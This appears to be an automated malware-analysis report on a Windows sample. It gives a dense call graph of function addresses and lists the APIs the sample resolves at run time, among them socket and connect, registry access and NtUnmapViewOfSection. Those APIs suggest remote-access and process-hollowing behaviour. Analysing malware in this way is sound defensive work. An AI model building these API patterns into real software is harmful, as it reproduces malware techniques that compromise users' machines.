API calls 40515->40522 40517 40eb91 WSAGetLastError 40973 414e7e 30 API calls 40517->40973 40522->40498 40522->40501 40522->40507 40522->40510 40522->40514 40522->40515 40522->40517 40524 413bcc 79 API calls 40522->40524 40526 402a91 28 API calls 40522->40526 40527 4034fa 11 API calls 40522->40527 40528 433426 39 API calls 40522->40528 40530 404779 28 API calls 40522->40530 40531 402178 28 API calls 40522->40531 40533 403509 28 API calls 40522->40533 40536 40d033 31 API calls 40522->40536 40540 40edcd 40522->40540 40863 406ba2 40522->40863 40870 40e8ee 40522->40870 40876 401673 40522->40876 40883 401d6f 40522->40883 40898 40170e connect 40522->40898 40958 401c4f WaitForSingleObject 40522->40958 40974 402a6d 28 API calls 40522->40974 40975 40dfc6 50 API calls 40522->40975 40976 437a48 20 API calls 40522->40976 40977 40d18b RegOpenKeyExA RegQueryValueExA RegCloseKey 40522->40977 40524->40522 40526->40522 40527->40522 40529 40f48c Sleep 40528->40529 40529->40522 40530->40522 40531->40522 40533->40522 40536->40522 40537 403509 28 API calls 40537->40540 40540->40522 40540->40537 40541 414155 28 API calls 40540->40541 40542 4034cf 22 API calls 40540->40542 40547 4142e7 28 API calls 40540->40547 40550 406ae8 28 API calls 40540->40550 40551 404804 28 API calls 40540->40551 40552 404779 28 API calls 40540->40552 40554 402091 11 API calls 40540->40554 40555 4034ff 11 API calls 40540->40555 40557 402178 28 API calls 40540->40557 40558 413bcc 79 API calls 40540->40558 40978 409344 6 API calls 40540->40978 40979 414209 28 API calls 40540->40979 40981 4140ad GetTickCount 40540->40981 40982 41405d 30 API calls ___scrt_get_show_window_mode 40540->40982 40983 40a7d3 29 API calls 40540->40983 40984 4047c1 28 API calls 40540->40984 40985 4018e7 64 API calls 40540->40985 40986 401a3c 116 API calls new 40540->40986 40541->40540 40543 40ee4e GetTickCount 40542->40543 40980 414155 28 API calls 40543->40980 40547->40540 40550->40540 40551->40540 40552->40540 40554->40540 40555->40540 40557->40540 40558->40540 40559->40126 40560->40136 40561->40140 40563->40190 40564->40199 40565->40218 40567 413ba2 LoadResource LockResource SizeofResource 40566->40567 40568 40a627 40566->40568 40567->40568 40569 432316 40568->40569 40570 43b5d9 40569->40570 40571 43b617 40570->40571 40573 43b602 HeapAlloc 40570->40573 40577 43b5eb __Getctype 40570->40577 40588 434256 20 API calls _Atexit 40571->40588 40574 43b615 40573->40574 40573->40577 40575 43b61c 40574->40575 40575->40283 40577->40571 40577->40573 40587 43864e 7 API calls 2 library calls 40577->40587 40579 4021aa 40578->40579 40589 402261 40579->40589 40581 4021b5 40593 4023a6 40581->40593 40583 4021c2 40583->40286 40585 40219f 28 API calls 40584->40585 40586 404978 40585->40586 40586->40293 40587->40577 40588->40575 40590 4022bb 40589->40590 40591 40226e 40589->40591 40590->40581 40591->40590 40600 402698 11 API calls std::_Deallocate 40591->40600 40594 4023b6 40593->40594 40595 4023d1 40594->40595 40597 4023bc 40594->40597 40611 402723 28 API calls 40595->40611 40601 402405 40597->40601 40599 4023cf 40599->40583 40600->40590 40612 4026bf 40601->40612 40603 402419 40604 402443 40603->40604 40605 40242e 40603->40605 40619 402723 28 API calls 40604->40619 40617 402879 22 API calls 40605->40617 40608 402437 40618 402818 22 API calls 40608->40618 40610 402441 40610->40599 40611->40599 40613 4026ca 40612->40613 40614 4026d1 40613->40614 40620 4028af 22 API calls 40613->40620 40614->40603 40617->40608 40618->40610 40619->40610 40622 4021d1 40621->40622 40623 402261 11 API calls 40622->40623 40624 4021dc 40623->40624 40624->40311 40625->40311 40626->40311 40627->40310 40628->40321 40629->40325 40630->40330 40631->40327 40635 402bae 40633->40635 40634 402bcc 40634->40341 40635->40634 40641 402723 28 API calls 40635->40641 40638 40205b 40637->40638 40642 40251a 40638->40642 40640 40206a 40640->40344 40641->40634 40643 4026bf 22 API calls 40642->40643 40644 40252d 40643->40644 40645 402551 40644->40645 40646 402599 40644->40646 40650 402562 40645->40650 40651 402723 28 API calls 40645->40651 40652 4026de 22 API calls 40646->40652 40650->40640 40651->40650 40654 40204a 40653->40654 40663 40248f 40654->40663 40656 402056 40656->40346 40658 40211c 40657->40658 40659 402261 11 API calls 40658->40659 40660 402136 40659->40660 40676 4025a1 40660->40676 40664 40249f 40663->40664 40665 4024a5 40664->40665 40666 4024ba 40664->40666 40667 40251a 28 API calls 40665->40667 40668 4024d0 40666->40668 40669 402512 40666->40669 40673 4024b8 40667->40673 40668->40673 40674 402723 28 API calls 40668->40674 40675 4026de 22 API calls 40669->40675 40673->40656 40674->40673 40677 4025b3 40676->40677 40678 402261 11 API calls 40677->40678 40679 402147 40678->40679 40679->40349 40680->40357 40681->40363 40683 402255 40682->40683 40683->40367 40685 4139b4 40684->40685 40686 41445f GetCurrentProcess 40684->40686 40687 40d033 RegOpenKeyExA 40685->40687 40686->40685 40688 40d061 RegQueryValueExA RegCloseKey 40687->40688 40689 40d08b 40687->40689 40688->40689 40690 402178 28 API calls 40689->40690 40691 40d0a0 40690->40691 40691->40373 40692->40381 40694 4152e1 40693->40694 40699 4035a8 40694->40699 40696 4152ec 40703 41542e 40696->40703 40698 4152f9 40698->40388 40700 403602 40699->40700 40701 4035b5 40699->40701 40700->40696 40701->40700 40710 4036df 11 API calls std::_Deallocate 40701->40710 40704 415468 40703->40704 40705 41543a 40703->40705 40722 4026de 22 API calls 40704->40722 40711 403723 40705->40711 40709 415444 40709->40698 40710->40700 40712 40372f 40711->40712 40713 403790 40712->40713 40714 403738 40712->40714 40724 4026de 22 API calls 40713->40724 40717 403741 40714->40717 40719 403754 40714->40719 40723 403856 28 API calls __EH_prolog 40717->40723 40720 403752 40719->40720 40721 4035a8 11 API calls 40719->40721 40720->40709 40721->40720 40723->40720 40725->40397 40727 406833 40726->40727 40728 4035a8 11 API calls 40727->40728 40729 4068b5 40728->40729 40729->40397 40731 402395 40730->40731 40732 4023a6 28 API calls 40731->40732 40733 402198 40732->40733 40733->40178 40750 4332d3 40734->40750 40736 432696 40756 4331fc 35 API calls 3 library calls 40736->40756 40738 432670 40755 434256 20 API calls _Atexit 40738->40755 40739 43265b 40739->40736 40739->40738 40741 432675 pre_c_initialization 40739->40741 40741->40416 40743 4326a2 40744 4326d1 40743->40744 40757 433318 39 API calls __Toupper 40743->40757 40747 43273d 40744->40747 40758 43327f 20 API calls 2 library calls 40744->40758 40759 43327f 20 API calls 2 library calls 40747->40759 40748 432804 swprintf 40748->40741 40760 434256 20 API calls _Atexit 40748->40760 40751 4332eb 40750->40751 40752 4332d8 40750->40752 40751->40739 40761 434256 20 API calls _Atexit 40752->40761 40754 4332dd pre_c_initialization 40754->40739 40755->40741 40756->40743 40757->40743 40758->40747 40759->40748 40760->40741 40761->40754 40768 40205b 40762->40768 40764 404789 40765 40210e 11 API calls 40764->40765 40766 404798 40765->40766 40766->40430 40767->40433 40769 40251a 28 API calls 40768->40769 40770 40206a 40769->40770 40770->40764 40772 403514 40771->40772 40773 4035a8 11 API calls 40772->40773 40774 40351f 40773->40774 40787 403621 40774->40787 40777 409450 40799 4094b7 40777->40799 40779 409460 40803 406547 40779->40803 40782 407d1f 40824 4067ef 40782->40824 40784 407d2f 40785 406547 11 API calls 40784->40785 40786 407d3e 40785->40786 40786->40448 40788 40362f char_traits 40787->40788 40791 403640 40788->40791 40790 403529 40790->40777 40792 403650 40791->40792 40793 403656 40792->40793 40794 40366d 40792->40794 40798 4037c7 28 API calls 40793->40798 40795 403723 28 API calls 40794->40795 40797 40366b 40795->40797 40797->40790 40798->40797 40800 4094c5 char_traits 40799->40800 40809 4094d7 40800->40809 40802 4094d2 40802->40779 40804 406555 40803->40804 40805 4035a8 11 API calls 40804->40805 40806 40656f 40805->40806 40807 406821 11 API calls 40806->40807 40808 406580 40807->40808 40808->40782 40810 4094e7 40809->40810 40811 409505 40810->40811 40813 4094ed 40810->40813 40812 4026bf 22 API calls 40811->40812 40814 40950d 40812->40814 40822 406f79 28 API calls 40813->40822 40816 409581 40814->40816 40817 409524 40814->40817 40823 4026de 22 API calls 40816->40823 40819 403723 28 API calls 40817->40819 40821 409503 40817->40821 40819->40821 40821->40802 40822->40821 40825 4067fd char_traits 40824->40825 40828 406962 40825->40828 40827 406809 40827->40784 40829 406972 40828->40829 40830 406978 40829->40830 40831 40698f 40829->40831 40839 4069f2 28 API calls 40830->40839 40832 4069a5 40831->40832 40833 4069ea 40831->40833 40837 403723 28 API calls 40832->40837 40838 40698d 40832->40838 40840 4026de 22 API calls 40833->40840 40837->40838 40838->40827 40839->40838 40847 433831 40841->40847 40845 40d352 40844->40845 40846 40d328 RegSetValueExA RegCloseKey 40844->40846 40845->40470 40846->40845 40850 4337b2 40847->40850 40849 4087ed 40849->40468 40851 4337c1 40850->40851 40853 4337d5 40850->40853 40856 434256 20 API calls _Atexit 40851->40856 40855 4337c6 pre_c_initialization __alldvrm 40853->40855 40857 43d396 11 API calls 2 library calls 40853->40857 40855->40849 40856->40855 40857->40855 40860 413ee7 ___scrt_get_show_window_mode 40858->40860 40859 402178 28 API calls 40861 40e94e 40859->40861 40860->40859 40861->40476 40862->40493 40864 4021c9 11 API calls 40863->40864 40865 406bb1 40864->40865 40866 402ba1 28 API calls 40865->40866 40867 406bcd 40866->40867 40868 40206e 28 API calls 40867->40868 40869 406bd5 40868->40869 40869->40522 40871 40e907 WSASetLastError 40870->40871 40872 40e8fd 40870->40872 40871->40522 40987 40e783 29 API calls ___std_exception_copy 40872->40987 40874 40e902 40874->40871 40877 40168c socket 40876->40877 40878 40167f 40876->40878 40880 4016a6 CreateEventW 40877->40880 40881 401688 40877->40881 40988 4016e4 WSAStartup 40878->40988 40880->40522 40881->40522 40882 401684 40882->40877 40882->40881 40884 401e08 40883->40884 40885 401d83 40883->40885 40884->40522 40886 401d8c 40885->40886 40887 401dde CreateEventA CreateThread 40885->40887 40888 401d9b GetLocalTime 40885->40888 40886->40887 40887->40884 40991 401f6e 40887->40991 40989 414155 28 API calls 40888->40989 40890 401daf 40990 402a6d 28 API calls 40890->40990 40892 401dbf 40893 402178 28 API calls 40892->40893 40894 401dce 40893->40894 40895 413bcc 79 API calls 40894->40895 40896 401dd3 40895->40896 40897 402091 11 API calls 40896->40897 40897->40887 40899 401861 40898->40899 40900 401734 40898->40900 40901 401867 WSAGetLastError 40899->40901 40902 4017c4 40899->40902 40900->40902 40903 401769 40900->40903 40906 402a91 28 API calls 40900->40906 40901->40902 40904 401877 40901->40904 40902->40522 40995 419105 40903->40995 40907 401778 40904->40907 40908 40187c 40904->40908 40910 401755 40906->40910 40913 402178 28 API calls 40907->40913 41013 414e7e 30 API calls 40908->41013 40914 402178 28 API calls 40910->40914 40912 401787 40923 401796 40912->40923 40924 4017cd 40912->40924 40916 4018c6 40913->40916 40917 401764 40914->40917 40915 401886 41014 402a6d 28 API calls 40915->41014 40920 402178 28 API calls 40916->40920 40921 413bcc 79 API calls 40917->40921 40919 401896 40922 402178 28 API calls 40919->40922 40925 4018d5 40920->40925 40921->40903 40926 4018a5 40922->40926 40928 402178 28 API calls 40923->40928 41010 419e09 57 API calls 40924->41010 40929 413bcc 79 API calls 40925->40929 40930 413bcc 79 API calls 40926->40930 40932 4017a5 40928->40932 40929->40902 40933 4018aa 40930->40933 40931 4017d5 40934 40180a 40931->40934 40935 4017da 40931->40935 40936 402178 28 API calls 40932->40936 40937 402091 11 API calls 40933->40937 41012 4192a0 28 API calls 40934->41012 40938 402178 28 API calls 40935->40938 40939 4017b4 40936->40939 40937->40902 40941 4017e9 40938->40941 40942 413bcc 79 API calls 40939->40942 40945 402178 28 API calls 40941->40945 40956 4017b9 40942->40956 40943 401812 40944 40183f CreateEventW CreateEventW 40943->40944 40946 402178 28 API calls 40943->40946 40944->40902 40947 4017f8 40945->40947 40948 401828 40946->40948 40949 413bcc 79 API calls 40947->40949 40951 402178 28 API calls 40948->40951 40952 4017fd 40949->40952 40953 401837 40951->40953 41011 419552 55 API calls 40952->41011 40955 413bcc 79 API calls 40953->40955 40957 40183c 40955->40957 41003 41914b 40956->41003 40957->40944 40959 401c65 SetEvent CloseHandle 40958->40959 40960 401c7c closesocket 40958->40960 40961 401d05 40959->40961 40962 401c89 40960->40962 40961->40522 40963 401c98 40962->40963 40964 401c9f 40962->40964 41051 401eff 83 API calls 40963->41051 40966 401cb1 WaitForSingleObject 40964->40966 40967 401cfb SetEvent CloseHandle 40964->40967 40968 41914b 3 API calls 40966->40968 40967->40961 40969 401cc4 SetEvent WaitForSingleObject 40968->40969 40970 41914b 3 API calls 40969->40970 40971 401ce0 SetEvent CloseHandle CloseHandle 40970->40971 40971->40967 40972->40522 40973->40522 40974->40522 40975->40522 40976->40522 40977->40522 40978->40540 40979->40540 40980->40540 40981->40540 40982->40540 40983->40540 40984->40540 40985->40540 40986->40540 40987->40874 40988->40882 40989->40890 40990->40892 40994 401f7f 101 API calls 40991->40994 40993 401f7a 40994->40993 40996 41911a 40995->40996 40997 401771 40995->40997 41015 42a8be 40996->41015 40997->40907 40997->40912 40999 419124 40999->40997 41020 4164cd 40999->41020 41004 419153 41003->41004 41005 416c2d 41003->41005 41004->40902 41006 416c3b 41005->41006 41049 415d66 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 41005->41049 41050 41695d DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 41006->41050 41009 416c42 41010->40931 41011->40956 41012->40943 41013->40915 41014->40919 41016 42a8c8 41015->41016 41017 42a8cc 41015->41017 41016->40999 41018 432316 new 21 API calls 41017->41018 41019 42a8d1 41018->41019 41019->40999 41022 4164e4 ctype ___scrt_get_show_window_mode 41020->41022 41021 4166ec 41026 41669a 41021->41026 41035 41606a DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 41021->41035 41022->41021 41024 42a8be 21 API calls 41022->41024 41028 416693 ___scrt_get_show_window_mode 41024->41028 41025 4166fd 41025->41026 41027 42a8be 21 API calls 41025->41027 41026->40997 41034 416c2d DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 41026->41034 41029 416736 41027->41029 41028->41026 41030 42a8be 21 API calls 41028->41030 41029->41026 41036 42af2a 41029->41036 41032 4166c2 ___scrt_get_show_window_mode 41030->41032 41032->41026 41033 42a8be 21 API calls 41032->41033 41033->41021 41035->41025 41039 42ae49 41036->41039 41038 42af32 41038->41026 41040 42ae62 41039->41040 41043 42ae58 41039->41043 41041 42a8be 21 API calls 41040->41041 41040->41043 41042 42ae83 41041->41042 41042->41043 41045 42b1e6 CryptAcquireContextA 41042->41045 41043->41038 41046 42b205 41045->41046 41047 42b20a CryptGenRandom 41045->41047 41046->41043 41047->41046 41048 42b21e CryptReleaseContext 41047->41048 41048->41046 41049->41006 41050->41009 41051->40964 41054 40a6db 41052->41054 41055 40a70d 41054->41055 41057 40a776 41054->41057 41059 40a766 Sleep 41054->41059 41078 40cfd6 RegOpenKeyExA 41054->41078 41056 403509 28 API calls 41055->41056 41055->41059 41060 414225 28 API calls 41055->41060 41067 4034ff 11 API calls 41055->41067 41070 402178 28 API calls 41055->41070 41074 40d202 14 API calls 41055->41074 41081 408817 54 API calls ___scrt_get_show_window_mode 41055->41081 41082 40d2a7 14 API calls 41055->41082 41056->41055 41058 403509 28 API calls 41057->41058 41061 40a781 41058->41061 41059->41054 41060->41055 41063 414225 28 API calls 41061->41063 41064 40a78d 41063->41064 41083 40d2a7 14 API calls 41064->41083 41067->41055 41068 40a79b 41069 4034ff 11 API calls 41068->41069 41071 40a7a7 41069->41071 41070->41055 41072 402178 28 API calls 41071->41072 41073 40a7b4 41072->41073 41075 40d202 14 API calls 41073->41075 41074->41055 41076 40a7c7 ExitProcess 41075->41076 41079 40d000 RegQueryValueExA RegCloseKey 41078->41079 41080 40d02d 41078->41080 41079->41080 41080->41054 41082->41055 41083->41068 41591 40f9dd 71 API calls 41593 4029e3 12 API calls __CxxThrowException@8 41709 40bfe4 36 API calls 41710 423be7 28 API calls 41712 40c3ec 81 API calls 41713 40f7ec 29 API calls 41597 4091fb 44 API calls 41598 43b1f8 50 API calls 5 library calls 41599 438dfc 57 API calls 41718 40f781 45 API calls 41719 42bf83 DeleteCriticalSection CloseHandle 41600 40b584 70 API calls Concurrency::wait 41722 403f90 81 API calls 41602 44399d 41 API calls 4 library calls 41724 42d79b 41 API calls 41725 40139a LoadLibraryA GetProcAddress 41117 41eb9f 41118 41ebb4 41117->41118 41133 41ec46 41117->41133 41119 41ebc2 41118->41119 41159 416e98 41118->41159 41121 41ec76 41119->41121 41122 41ecd6 41119->41122 41123 41ec01 41119->41123 41124 41ecfd 41119->41124 41125 41ecab 41119->41125 41131 41ec36 41119->41131 41119->41133 41135 41d1b3 41119->41135 41121->41125 41129 417fef 55 API calls 41121->41129 41121->41133 41122->41124 41122->41133 41164 41dd6f 50 API calls 41122->41164 41123->41131 41123->41133 41145 417fef 41123->41145 41124->41133 41165 41e339 30 API calls 41124->41165 41125->41122 41163 41d99c 23 API calls 41125->41163 41129->41121 41131->41121 41131->41133 41134 41d1b3 50 API calls 41131->41134 41134->41121 41136 41d1c5 41135->41136 41137 41d1cf 41135->41137 41136->41123 41166 41bc23 41137->41166 41139 41d1f2 41139->41136 41180 4170f6 21 API calls 41139->41180 41141 41d221 41141->41136 41143 41d272 ctype 41141->41143 41181 42af36 41141->41181 41143->41136 41144 416e98 2 API calls 41143->41144 41144->41136 41152 418009 41145->41152 41147 417ef7 23 API calls 41147->41152 41148 41848e 41493 4187b2 24 API calls 41148->41493 41150 418487 41495 4187b2 24 API calls 41150->41495 41152->41147 41152->41148 41152->41150 41153 4184cb 41152->41153 41156 41805c 41152->41156 41489 417120 24 API calls 41152->41489 41490 41cf75 24 API calls 41152->41490 41491 417dd1 24 API calls 41152->41491 41492 41e9ee 53 API calls ctype 41152->41492 41494 4187b2 24 API calls 41153->41494 41156->41123 41160 416ea6 41159->41160 41161 416ead 41159->41161 41160->41119 41161->41160 41496 41ee06 41161->41496 41163->41122 41164->41124 41165->41133 41168 41bc36 41166->41168 41172 41bc60 41166->41172 41167 41bcb3 41171 41bd2a 41167->41171 41185 41ac0a 41167->41185 41168->41172 41203 41bb34 21 API calls 41168->41203 41171->41139 41172->41167 41172->41171 41204 41a600 21 API calls 41172->41204 41173 41bcc9 41173->41171 41190 41a8ce 41173->41190 41176 41bcee 41176->41171 41178 41bd08 41176->41178 41205 41ace4 21 API calls 41176->41205 41178->41171 41195 41b67b 41178->41195 41180->41141 41182 42af4b 41181->41182 41184 42af66 41181->41184 41183 42b1e6 3 API calls 41182->41183 41182->41184 41183->41184 41184->41143 41186 41ac14 41185->41186 41187 41ac0e 41185->41187 41206 41a21d 21 API calls 41186->41206 41187->41173 41189 41ac1e 41189->41173 41191 41a8e3 41190->41191 41192 41a8d2 41190->41192 41191->41176 41192->41191 41207 41a21d 21 API calls 41192->41207 41194 41a8e0 41194->41176 41196 41b698 41195->41196 41199 41b6a5 41196->41199 41216 41a21d 21 API calls 41196->41216 41200 41b6f2 41199->41200 41201 41b6bd 41199->41201 41217 41b639 21 API calls 41199->41217 41200->41201 41208 41af31 41200->41208 41201->41171 41203->41172 41204->41167 41205->41178 41206->41189 41207->41194 41209 41af3c 41208->41209 41211 41af43 41208->41211 41228 41acfb 23 API calls 2 library calls 41209->41228 41213 41af48 41211->41213 41218 41ae27 41211->41218 41212 41af41 41212->41201 41213->41201 41215 41af60 41215->41201 41216->41199 41217->41200 41219 41ae44 41218->41219 41220 42a8be 21 API calls 41219->41220 41224 41ae4e 41219->41224 41221 41ae9b 41220->41221 41221->41224 41229 4259c1 41221->41229 41223 41aed0 41223->41224 41225 42a8be 21 API calls 41223->41225 41224->41215 41226 41aedf 41225->41226 41226->41224 41237 4268af 23 API calls 2 library calls 41226->41237 41228->41212 41230 4259fb 41229->41230 41231 425a69 41229->41231 41230->41231 41238 423fff 41230->41238 41231->41223 41233 425a36 41233->41231 41250 4257ab 41233->41250 41235 425a54 41235->41231 41257 42581d 41235->41257 41237->41224 41240 424013 41238->41240 41249 4240c0 41238->41249 41239 42404c 41241 424069 41239->41241 41274 423fbb 44 API calls 41239->41274 41240->41239 41240->41249 41273 423fbb 44 API calls 41240->41273 41244 424086 41241->41244 41275 423fbb 44 API calls 41241->41275 41247 4240a3 41244->41247 41276 423fbb 44 API calls 41244->41276 41247->41249 41277 423fbb 44 API calls 41247->41277 41249->41233 41251 42af36 3 API calls 41250->41251 41252 4257bf 41251->41252 41254 4257f5 41252->41254 41278 42776a 22 API calls 41252->41278 41254->41235 41255 4257d4 41255->41254 41279 42821c 23 API calls 41255->41279 41258 42585c 41257->41258 41262 425852 41257->41262 41259 423fff 44 API calls 41258->41259 41260 425869 41258->41260 41259->41260 41260->41262 41280 42542c 41260->41280 41262->41231 41263 4258db 41263->41262 41283 42742d 41263->41283 41266 42742d 22 API calls 41267 42590a 41266->41267 41267->41262 41287 4281e9 41267->41287 41271 425950 41271->41262 41315 4249f7 23 API calls 41271->41315 41273->41239 41274->41241 41275->41244 41276->41247 41277->41249 41278->41255 41279->41254 41281 42a8be 21 API calls 41280->41281 41282 425435 ___scrt_get_show_window_mode 41281->41282 41282->41263 41284 427437 41283->41284 41286 4258f6 41283->41286 41284->41286 41316 42749d 41284->41316 41286->41262 41286->41266 41288 4281f4 41287->41288 41289 42749d 22 API calls 41288->41289 41290 42592f 41289->41290 41290->41262 41291 4251f6 41290->41291 41292 42520f 41291->41292 41302 4252a6 41291->41302 41293 42542c 21 API calls 41292->41293 41294 425252 41292->41294 41292->41302 41293->41292 41295 42542c 21 API calls 41294->41295 41296 425257 41295->41296 41296->41302 41324 425134 41296->41324 41298 42526f 41298->41302 41341 428537 41298->41341 41301 42742d 22 API calls 41307 4252fe 41301->41307 41302->41271 41303 425343 41303->41302 41347 424c6b 41303->41347 41307->41303 41308 428537 22 API calls 41307->41308 41308->41303 41309 425389 41309->41302 41375 42bb50 22 API calls 41309->41375 41311 4253c1 41311->41302 41376 42bb50 22 API calls 41311->41376 41313 4253da 41313->41302 41377 42bb50 22 API calls 41313->41377 41315->41262 41317 4274a8 41316->41317 41319 4274bc 41317->41319 41320 42a8e8 41317->41320 41319->41286 41321 42a8f3 41320->41321 41322 42a8f7 41320->41322 41321->41319 41323 434b86 22 API calls 41322->41323 41323->41321 41325 425149 41324->41325 41326 42519f 41325->41326 41378 429c7a 22 API calls 41325->41378 41326->41298 41328 42515b 41328->41326 41329 4251a1 41328->41329 41330 425176 41328->41330 41379 4294e4 23 API calls 41329->41379 41331 42742d 22 API calls 41330->41331 41334 42517d 41331->41334 41333 4251ad 41333->41326 41380 4294e4 23 API calls 41333->41380 41334->41326 41336 42742d 22 API calls 41334->41336 41338 42518e 41336->41338 41337 4251c7 41337->41326 41381 4294e4 23 API calls 41337->41381 41338->41326 41340 42742d 22 API calls 41338->41340 41340->41326 41342 42854f 41341->41342 41345 42855d 41341->41345 41382 42858b 22 API calls 41342->41382 41344 4252ec 41344->41301 41344->41303 41383 428674 22 API calls 41345->41383 41348 42742d 22 API calls 41347->41348 41349 424c85 41348->41349 41350 42742d 22 API calls 41349->41350 41351 424ce6 41349->41351 41352 424c98 41350->41352 41373 424d54 41351->41373 41486 424b89 26 API calls 41351->41486 41352->41351 41353 42742d 22 API calls 41352->41353 41355 424cab 41353->41355 41355->41351 41483 4246d4 23 API calls 41355->41483 41357 424cc2 41357->41351 41484 425497 22 API calls 41357->41484 41358 424d1f 41358->41373 41487 424b89 26 API calls 41358->41487 41359 4250f7 41362 42742d 22 API calls 41359->41362 41365 425103 41362->41365 41364 424cd5 41364->41351 41485 425497 22 API calls 41364->41485 41367 42742d 22 API calls 41365->41367 41370 425129 41365->41370 41368 425116 41367->41368 41369 42742d 22 API calls 41368->41369 41368->41370 41369->41370 41370->41302 41374 42a628 22 API calls 41370->41374 41372 42bb50 22 API calls 41372->41373 41373->41359 41373->41370 41373->41372 41384 42415c 41373->41384 41488 4246d4 23 API calls 41373->41488 41374->41309 41375->41311 41376->41313 41377->41302 41378->41328 41379->41333 41380->41337 41381->41326 41382->41344 41383->41344 41385 424177 41384->41385 41388 424247 41384->41388 41386 429537 22 API calls 41385->41386 41385->41388 41393 4241d1 41386->41393 41387 42424f 41389 42742d 22 API calls 41387->41389 41388->41373 41390 42425e 41389->41390 41390->41388 41391 42742d 22 API calls 41390->41391 41392 424276 41391->41392 41392->41388 41394 42742d 22 API calls 41392->41394 41393->41387 41393->41388 41400 424229 41393->41400 41395 42428e 41394->41395 41395->41388 41396 42435d 41395->41396 41398 429596 23 API calls 41395->41398 41396->41388 41397 429596 23 API calls 41396->41397 41399 424375 41397->41399 41401 4242b3 41398->41401 41399->41388 41402 4290f9 22 API calls 41399->41402 41403 4246d4 23 API calls 41400->41403 41401->41388 41404 4290f9 22 API calls 41401->41404 41405 42438c 41402->41405 41403->41388 41406 4242ca 41404->41406 41405->41388 41407 4295c3 23 API calls 41405->41407 41406->41388 41408 4295c3 23 API calls 41406->41408 41410 4243a8 41407->41410 41409 4242e2 41408->41409 41409->41388 41411 4290f9 22 API calls 41409->41411 41410->41388 41412 4290f9 22 API calls 41410->41412 41413 4242f7 41411->41413 41414 4243c0 41412->41414 41413->41388 41415 4295c3 23 API calls 41413->41415 41414->41388 41416 4295c3 23 API calls 41414->41416 41417 424312 41415->41417 41418 4243db 41416->41418 41417->41388 41420 4290f9 22 API calls 41417->41420 41418->41388 41419 4290f9 22 API calls 41418->41419 41421 4243f3 41419->41421 41422 42432a 41420->41422 41421->41388 41423 4295c3 23 API calls 41421->41423 41422->41388 41424 4295c3 23 API calls 41422->41424 41425 42440e 41423->41425 41426 424345 41424->41426 41425->41388 41427 4290f9 22 API calls 41425->41427 41426->41388 41428 4290f9 22 API calls 41426->41428 41429 424426 41427->41429 41428->41396 41429->41388 41430 429537 22 API calls 41429->41430 41431 424442 41430->41431 41431->41388 41432 42955d 22 API calls 41431->41432 41433 42445c 41432->41433 41433->41388 41434 42955d 22 API calls 41433->41434 41435 424477 41434->41435 41435->41388 41436 429537 22 API calls 41435->41436 41437 42448f 41436->41437 41437->41388 41438 42955d 22 API calls 41437->41438 41439 4244a9 41438->41439 41439->41388 41440 42955d 22 API calls 41439->41440 41441 4244c3 41440->41441 41441->41388 41442 4244fb 41441->41442 41444 4295c3 23 API calls 41441->41444 41442->41388 41443 4295c3 23 API calls 41442->41443 41445 424515 41443->41445 41446 4244e3 41444->41446 41445->41388 41447 4290f9 22 API calls 41445->41447 41446->41388 41448 4290f9 22 API calls 41446->41448 41449 42452d 41447->41449 41448->41442 41449->41388 41450 4295c3 23 API calls 41449->41450 41451 424547 41450->41451 41451->41388 41452 4290f9 22 API calls 41451->41452 41453 42455f 41452->41453 41453->41388 41454 429596 23 API calls 41453->41454 41455 424575 41454->41455 41455->41388 41456 4290f9 22 API calls 41455->41456 41457 424589 41456->41457 41457->41388 41458 4295c3 23 API calls 41457->41458 41459 4245a3 41458->41459 41459->41388 41460 4290f9 22 API calls 41459->41460 41461 4245bb 41460->41461 41461->41388 41462 4295c3 23 API calls 41461->41462 41463 4245d5 41462->41463 41463->41388 41464 4290f9 22 API calls 41463->41464 41465 4245ed 41464->41465 41465->41388 41466 429596 23 API calls 41465->41466 41467 424604 41466->41467 41467->41388 41468 4290f9 22 API calls 41467->41468 41469 424618 41468->41469 41469->41388 41470 429537 22 API calls 41469->41470 41471 424631 41470->41471 41471->41388 41472 429537 22 API calls 41471->41472 41473 424647 41472->41473 41473->41388 41474 429537 22 API calls 41473->41474 41475 42465d 41474->41475 41475->41388 41476 4295c3 23 API calls 41475->41476 41477 424675 41476->41477 41477->41388 41478 4290f9 22 API calls 41477->41478 41479 424689 41478->41479 41479->41388 41480 429537 22 API calls 41479->41480 41481 42469f 41480->41481 41481->41388 41482 428508 22 API calls 41481->41482 41482->41388 41483->41357 41484->41364 41485->41351 41486->41358 41487->41373 41488->41373 41489->41152 41490->41152 41491->41152 41492->41152 41493->41156 41494->41156 41495->41156 41501 41ee86 send 41496->41501 41603 40d9a0 84 API calls 41726 40afa2 23 API calls 41727 40f7a6 45 API calls 41606 4115a9 GdipAlloc GdipCloneImage 41728 4323a8 49 API calls 5 library calls 41608 4135b2 120 API calls 41730 40f7b4 69 API calls 41609 433dbb 21 API calls 3 library calls 41611 40e5bb 55 API calls 2 library calls 41612 42c1bf 21 API calls pre_c_initialization 41613 4109bf 48 API calls 41732 40abbe 67 API calls fpos

                                  Control-flow Graph

                                  APIs
                                  • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,0040A1F2), ref: 00414F00
                                  • GetProcAddress.KERNEL32(00000000), ref: 00414F09
                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,0040A1F2), ref: 00414F24
                                  • GetProcAddress.KERNEL32(00000000), ref: 00414F27
                                  • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,0040A1F2), ref: 00414F38
                                  • GetProcAddress.KERNEL32(00000000), ref: 00414F3B
                                  • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,0040A1F2), ref: 00414F50
                                  • GetProcAddress.KERNEL32(00000000), ref: 00414F53
                                  • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,0040A1F2), ref: 00414F64
                                  • GetProcAddress.KERNEL32(00000000), ref: 00414F67
                                  • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,0040A1F2), ref: 00414F73
                                  • GetProcAddress.KERNEL32(00000000), ref: 00414F76
                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0040A1F2), ref: 00414F87
                                  • GetProcAddress.KERNEL32(00000000), ref: 00414F8A
